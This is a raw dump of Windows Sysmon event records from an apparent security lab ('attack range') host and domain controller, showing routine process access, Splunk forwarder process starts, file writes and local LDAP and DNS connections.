10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-11FD-6216-6604-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11FD-6216-6604-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.660{4F8D34B0-11FD-6216-6604-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:45.420{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18DD8A63ECB23BB106E9314DC4CB71C9,SHA256=BC458F501F5E7721B0491CE6D96BBC2312CEE42C0485ADF5A863C0B888868028,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.362{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-65535- 10341000x8000000000000000289051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:45.036{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:45.036{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:46.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADD163775C861788FE70E2FB145BBD8E,SHA256=131B7C4E0DEE92E04301B9BF84BB987872FD3C1E424206AEA1EC4A409FCA4227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:46.421{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BBBE3608201C1529E371287D0A66384,SHA256=44B4995A185C0A226858EAA554DF5E23ABEBD7F340FAE25859F10D2BA399ACE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:46.034{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:46.003{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60F3431FBADC9903FCF373DC989C747C,SHA256=67BD9713C9194F5214758DC3E888F3DA266A3EEF642949CA8B611CFC1A5B25AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:46.003{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02D2C7FD4CAFB9744B80BA0C066E6EE3,SHA256=DEE674FA5F226E7A5DC613F9728A232F8ED9BF4074C40A8ECFE3BF40FC09E0E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.347{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53504-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.347{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53504-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.342{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local62096- 354300x8000000000000000289056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.316{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53503-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.316{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53503-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000289054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:46.005{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=206688D54190AB2851E4B2D28CD2D70C,SHA256=B3726881E6E43E0BFB017964EAB756F19C5500E10263F183C12B69A9F161DE33,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11FF-6216-6804-000000003902}2108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.768{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 